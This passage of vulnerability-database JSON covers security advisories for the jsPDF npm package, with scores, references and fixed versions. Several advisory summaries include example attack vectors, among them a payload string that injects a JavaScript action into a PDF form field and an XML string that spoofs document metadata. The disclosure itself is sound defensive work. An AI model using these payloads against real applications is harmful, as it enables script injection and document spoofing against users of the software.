}, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25755" }, { "reference_url": "https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-25755.md", "reference_id": 
"CVE-2026-25755.MD", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T17:07:08Z/" } ], "url": "https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-25755.md" }, { "reference_url": "https://github.com/advisories/GHSA-9vjf-qc39-jprp", "reference_id": "GHSA-9vjf-qc39-jprp", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9vjf-qc39-jprp" }, { "reference_url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-9vjf-qc39-jprp", "reference_id": "GHSA-9vjf-qc39-jprp", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T17:07:08Z/" } ], "url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-9vjf-qc39-jprp" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7110", "reference_id": "RHSA-2026:7110", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7110" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7128", "reference_id": "RHSA-2026:7128", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7128" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/74149?format=api", "purl": "pkg:npm/jspdf@4.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ 
{ "vulnerability": "VCID-6pvn-kfpj-e3g7" }, { "vulnerability": "VCID-h1m4-jwms-tqee" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/jspdf@4.2.0" } ], "aliases": [ "CVE-2026-25755", "GHSA-9vjf-qc39-jprp" ], "risk_score": 4.3, "exploitability": "0.5", "weighted_severity": "8.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hu3v-vhnb-kuhw" } ], "fixing_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49940?format=api", "vulnerability_id": "VCID-2555-3wmg-bke6", "summary": "jsPDF Vulnerable to Denial of Service (DoS) via Unvalidated BMP Dimensions in BMPDecoder\nUser control of the first argument of the `addImage` method results in Denial of Service.\n\nIf given the possibility to pass unsanitized image data or URLs to the `addImage` method, a user can provide a harmful BMP file that results in out of memory errors and denial of service. Harmful BMP files have large width and/or height entries in their headers, which lead to excessive memory allocation.\n\nOther affected methods are: `html`.\n\nExample attack vector:\n\n```js\nimport { jsPDF } from \"jspdf\"\n\n// malicious BMP image data with large width/height headers\nconst payload = ...\n\nconst doc = new jsPDF();\n\ndoc.addImage(payload, \"BMP\", 0, 0, 100, 100);\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24133.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24133.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24133", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12242", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", 
"scoring_elements": "0.12353", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12317", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12234", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24133" }, { "reference_url": "https://github.com/parallax/jsPDF", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/parallax/jsPDF" }, { "reference_url": "https://github.com/parallax/jsPDF/commit/ae4b93f76d8fc1baa5614bd5fdb5d174c3b85f0d", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-03T15:16:10Z/" } ], "url": "https://github.com/parallax/jsPDF/commit/ae4b93f76d8fc1baa5614bd5fdb5d174c3b85f0d" }, { "reference_url": "https://github.com/parallax/jsPDF/releases/tag/v4.1.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-03T15:16:10Z/" } ], "url": "https://github.com/parallax/jsPDF/releases/tag/v4.1.0" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436135", "reference_id": "2436135", 
"reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436135" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24133", "reference_id": "CVE-2026-24133", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24133" }, { "reference_url": "https://github.com/advisories/GHSA-95fx-jjr5-f39c", "reference_id": "GHSA-95fx-jjr5-f39c", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-95fx-jjr5-f39c" }, { "reference_url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-95fx-jjr5-f39c", "reference_id": "GHSA-95fx-jjr5-f39c", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-03T15:16:10Z/" } ], "url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-95fx-jjr5-f39c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73762?format=api", "purl": "pkg:npm/jspdf@4.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5hnn-r83k-u3ba" }, { "vulnerability": "VCID-6pvn-kfpj-e3g7" }, { "vulnerability": "VCID-fdf6-8j56-qqc6" }, { "vulnerability": "VCID-h1m4-jwms-tqee" }, { "vulnerability": "VCID-hu3v-vhnb-kuhw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/jspdf@4.1.0" } ], "aliases": [ 
"CVE-2026-24133", "GHSA-95fx-jjr5-f39c" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2555-3wmg-bke6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49910?format=api", "vulnerability_id": "VCID-4rm1-7nm2-7kfn", "summary": "jsPDF has PDF Injection in AcroFormChoiceField that allows Arbitrary JavaScript Execution\nUser control of properties and methods of the Acroform module allows users to inject arbitrary PDF objects, such as JavaScript actions.\n\nIf given the possibility to pass unsanitized input to one of the following methods or properties, a user can inject arbitrary PDF objects, such as JavaScript actions, which are executed when the victim opens the document. The vulnerable API members are:\n\n* `AcroformChoiceField.addOption`\n* `AcroformChoiceField.setOptions`\n* `AcroFormCheckBox.appearanceState`\n* `AcroFormRadioButton.appearanceState`\n\nExample attack vector:\n\n```js\nimport { jsPDF } from \"jspdf\"\nconst doc = new jsPDF();\n\nvar choiceField = new doc.AcroFormChoiceField();\nchoiceField.T = \"VulnerableField\";\nchoiceField.x = 20;\nchoiceField.y = 20;\nchoiceField.width = 100;\nchoiceField.height = 20;\n\n// PAYLOAD:\n// 1. Starts with \"/\" to bypass escaping.\n// 2. \"dummy]\" closes the array.\n// 3. \"/AA\" injects an Additional Action (Focus event).\n// 4. 
\"/JS\" executes arbitrary JavaScript.\nconst payload = \"/dummy] /AA << /Fo << /S /JavaScript /JS (app.alert('XSS')) >> >> /Garbage [\";\n\nchoiceField.addOption(payload);\ndoc.addField(choiceField);\n\ndoc.save(\"test.pdf\");\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24737.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24737.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24737", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06748", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06795", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.068", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06788", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06745", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24737" }, { "reference_url": "https://github.com/parallax/jsPDF", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/parallax/jsPDF" }, { "reference_url": "https://github.com/parallax/jsPDF/commit/da291a5f01b96282545c9391996702cdb8879f79", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-03T15:07:06Z/" } ], "url": "https://github.com/parallax/jsPDF/commit/da291a5f01b96282545c9391996702cdb8879f79" }, { "reference_url": "https://github.com/parallax/jsPDF/releases/tag/v4.1.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-03T15:07:06Z/" } ], "url": "https://github.com/parallax/jsPDF/releases/tag/v4.1.0" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436115", "reference_id": "2436115", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436115" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24737", "reference_id": "CVE-2026-24737", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24737" }, { "reference_url": "https://github.com/advisories/GHSA-pqxr-3g65-p328", "reference_id": "GHSA-pqxr-3g65-p328", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-pqxr-3g65-p328" }, { "reference_url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-pqxr-3g65-p328", "reference_id": "GHSA-pqxr-3g65-p328", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", 
"scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-03T15:07:06Z/" } ], "url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-pqxr-3g65-p328" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4466", "reference_id": "RHSA-2026:4466", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4466" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4467", "reference_id": "RHSA-2026:4467", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4467" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73762?format=api", "purl": "pkg:npm/jspdf@4.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5hnn-r83k-u3ba" }, { "vulnerability": "VCID-6pvn-kfpj-e3g7" }, { "vulnerability": "VCID-fdf6-8j56-qqc6" }, { "vulnerability": "VCID-h1m4-jwms-tqee" }, { "vulnerability": "VCID-hu3v-vhnb-kuhw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/jspdf@4.1.0" } ], "aliases": [ "CVE-2026-24737", "GHSA-pqxr-3g65-p328" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4rm1-7nm2-7kfn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49949?format=api", "vulnerability_id": "VCID-g47z-ehg3-vqbb", "summary": "jsPDF Vulnerable to Stored XMP Metadata Injection (Spoofing & Integrity Violation)\nUser control of the first argument of the `addMetadata` function allows users to inject arbitrary XML.\n\nIf given the possibility to pass unsanitized input to the `addMetadata` method, a user can inject arbitrary XMP 
metadata into the generated PDF. If the generated PDF is signed, stored or otherwise processed after, the integrity of the PDF can no longer be guaranteed.\n\nExample attack vector:\n\n```js\nimport { jsPDF } from \"jspdf\"\n\nconst doc = new jsPDF()\n\n// Input a string that closes the current XML tag and opens a new one.\n// We are injecting a fake \"dc:creator\" (Author) to spoof the document source.\nconst maliciousInput = '</jspdf:metadata></rdf:Description>' +\n'<rdf:Description xmlns:dc=\"http://purl.org/dc/elements/1.1/\">' +\n'<dc:creator>TRUSTED_ADMINISTRATOR</dc:creator>' + // <--- Spoofed Identity\n'</rdf:Description>' +\n'<rdf:Description><jspdf:metadata>'\n\n// The application innocently adds the user's input to the metadata\ndoc.addMetadata(maliciousInput, \"http://valid.namespace\")\n\ndoc.save(\"test.pdf\")\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24043.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24043.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24043", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05281", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05299", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05282", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05276", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05237", "published_at": "2026-06-08T12:55:00Z" } ], "url": 
"https://api.first.org/data/v1/epss?cve=CVE-2026-24043" }, { "reference_url": "https://github.com/parallax/jsPDF", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/parallax/jsPDF" }, { "reference_url": "https://github.com/parallax/jsPDF/commit/efe54bf50f3f5e5416b2495e3c24624fc80b6cff", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-03T15:20:54Z/" } ], "url": "https://github.com/parallax/jsPDF/commit/efe54bf50f3f5e5416b2495e3c24624fc80b6cff" }, { "reference_url": "https://github.com/parallax/jsPDF/releases/tag/v4.1.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-03T15:20:54Z/" } ], "url": "https://github.com/parallax/jsPDF/releases/tag/v4.1.0" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436149", "reference_id": "2436149", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436149" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24043", "reference_id": "CVE-2026-24043", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": 
"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24043" }, { "reference_url": "https://github.com/advisories/GHSA-vm32-vv63-w422", "reference_id": "GHSA-vm32-vv63-w422", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vm32-vv63-w422" }, { "reference_url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-vm32-vv63-w422", "reference_id": "GHSA-vm32-vv63-w422", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-03T15:20:54Z/" } ], "url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-vm32-vv63-w422" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73762?format=api", "purl": "pkg:npm/jspdf@4.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5hnn-r83k-u3ba" }, { "vulnerability": "VCID-6pvn-kfpj-e3g7" }, { "vulnerability": "VCID-fdf6-8j56-qqc6" }, { "vulnerability": "VCID-h1m4-jwms-tqee" }, { "vulnerability": "VCID-hu3v-vhnb-kuhw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/jspdf@4.1.0" } ], "aliases": [ "CVE-2026-24043", "GHSA-vm32-vv63-w422" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g47z-ehg3-vqbb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49919?format=api", 
"vulnerability_id": "VCID-wg74-rver-pqa7", "summary": "jsPDF has Shared State Race Condition in addJS Plugin\nThe addJS method in the jspdf Node.js build utilizes a shared module-scoped variable (text) to store JavaScript content. When used in a concurrent environment (e.g., a Node.js web server), this variable is shared across all requests.\n\nIf multiple requests generate PDFs simultaneously, the JavaScript content intended for one user may be overwritten by a subsequent request before the document is generated. This results in Cross-User Data Leakage, where the PDF generated for User A contains the JavaScript payload (and any embedded sensitive data) intended for User B.\n\nTypically, this only affects server-side environments, although the same race conditions might occur if jsPDF runs client-side.\n\n```js\nimport { jsPDF } from \"jspdf\";\n\nconst docA = new jsPDF();\nconst docB = new jsPDF();\n\n// 1. User A sets their script (stored in shared 'text' variable)\ndocA.addJS('console.log(\"Secret A\");');\n\n// 2. User B sets their script (overwrites shared 'text' variable)\ndocB.addJS('console.log(\"Secret B\");');\n\n// 3. 
User A saves their PDF (reads current 'text' variable)\ndocA.save(\"userA.pdf\");\n\n// Result: userA.pdf contains \"Secret B\" instead of \"Secret A\"\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24040.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:L/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24040.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24040", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.0344", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03464", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03478", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.0346", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03439", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24040" }, { "reference_url": "https://github.com/parallax/jsPDF", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/parallax/jsPDF" }, { "reference_url": "https://github.com/parallax/jsPDF/commit/2863e5c26afef211a545e8c174ab4d5fce3b8c0e", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" 
}, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-03T15:29:49Z/" } ], "url": "https://github.com/parallax/jsPDF/commit/2863e5c26afef211a545e8c174ab4d5fce3b8c0e" }, { "reference_url": "https://github.com/parallax/jsPDF/releases/tag/v4.1.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-03T15:29:49Z/" } ], "url": "https://github.com/parallax/jsPDF/releases/tag/v4.1.0" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436133", "reference_id": "2436133", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436133" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24040", "reference_id": "CVE-2026-24040", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24040" }, { "reference_url": "https://github.com/advisories/GHSA-cjw8-79x6-5cj4", "reference_id": "GHSA-cjw8-79x6-5cj4", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cjw8-79x6-5cj4" }, { "reference_url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-cjw8-79x6-5cj4", "reference_id": "GHSA-cjw8-79x6-5cj4", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", 
"scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-03T15:29:49Z/" } ], "url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-cjw8-79x6-5cj4" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4466", "reference_id": "RHSA-2026:4466", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4466" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4467", "reference_id": "RHSA-2026:4467", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4467" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73762?format=api", "purl": "pkg:npm/jspdf@4.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5hnn-r83k-u3ba" }, { "vulnerability": "VCID-6pvn-kfpj-e3g7" }, { "vulnerability": "VCID-fdf6-8j56-qqc6" }, { "vulnerability": "VCID-h1m4-jwms-tqee" }, { "vulnerability": "VCID-hu3v-vhnb-kuhw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/jspdf@4.1.0" } ], "aliases": [ "CVE-2026-24040", "GHSA-cjw8-79x6-5cj4" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wg74-rver-pqa7" } ], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/jspdf@4.1.0" }